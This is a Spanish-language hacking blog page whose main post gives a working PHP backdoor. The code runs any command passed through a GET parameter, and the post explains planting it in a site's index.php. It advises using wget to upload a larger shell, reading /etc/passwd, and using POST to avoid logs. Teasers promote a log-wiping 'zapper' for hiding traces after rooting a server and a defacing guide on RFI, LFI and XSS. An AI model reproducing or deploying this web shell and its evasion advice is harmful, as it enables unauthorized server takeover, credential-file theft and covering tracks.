Creando un minibackdoor en PHP

Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea).
Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El codigo seria así:

<form method="GET" action="lol.php">
<input type="text" name="comando">
<input type="submit" value="ejecutar">

<?php

if(isset($_GET['comando']));
{
$lol = @system($_GET['comando']);


echo $lol;
}

?>

En el formulario ponemos que comando ejecutar, asi tenemos control sobre el servidor y podemos ejecutar cualquier comando, si te da la gana usas wget (LINUX) y subes una shell y la borras, un claro ejemplo de como funciona seria este:

Explicaré un poco la función por la que nuestro Mini Backdoor trabaja:
System: Es una función que permite ejecutar comandos dentro de un servidor.

En la foto lo que hicé fue ejecutar el comando cat /etc/passwd y como pueden ver se ejecuto satisfactoriamente.

Otra cosa que podemos hacer es poner
$lol = @system($_GET['comando']);
en algún archivo ejemplo index.php y llamar a la variable lol por url y ejecutar el comando un ejemplo seria servidor.com/index.php?comando=cat+%2Fetc%2Fpasswd

y ejecutaria lo que es el comando.

Espero que les haya gustado.
Un saludo.

Read More

Zapper Para Borrar logs [Perl]

Hola amigos, Les vengo a dejar esta tool que tenia guardada por ahí y bueno se trata de un Zapper
¿Para Qué Sirve?
Bueno sirve para borrar los logs un ejemplo puede ser cuando rooteamos un servidor para evitar dejar rastro usa un zapper.

Codigo:

Read More

Paper Defacing By Okol

Hola amigos, vengo enseñándoles un paper que creé hace tiempo.
Se trata de defacing (Basico).
Incluye los temas:

Rfi (REMOTE FILE INCLUSION)


Lfi ( LOCAL FILE INCLUSION)      


Xss (CrosS Site Scripting)


Symlink con la tool (EN PHP )

Autor: Okol

                                                  Descarga!

Read More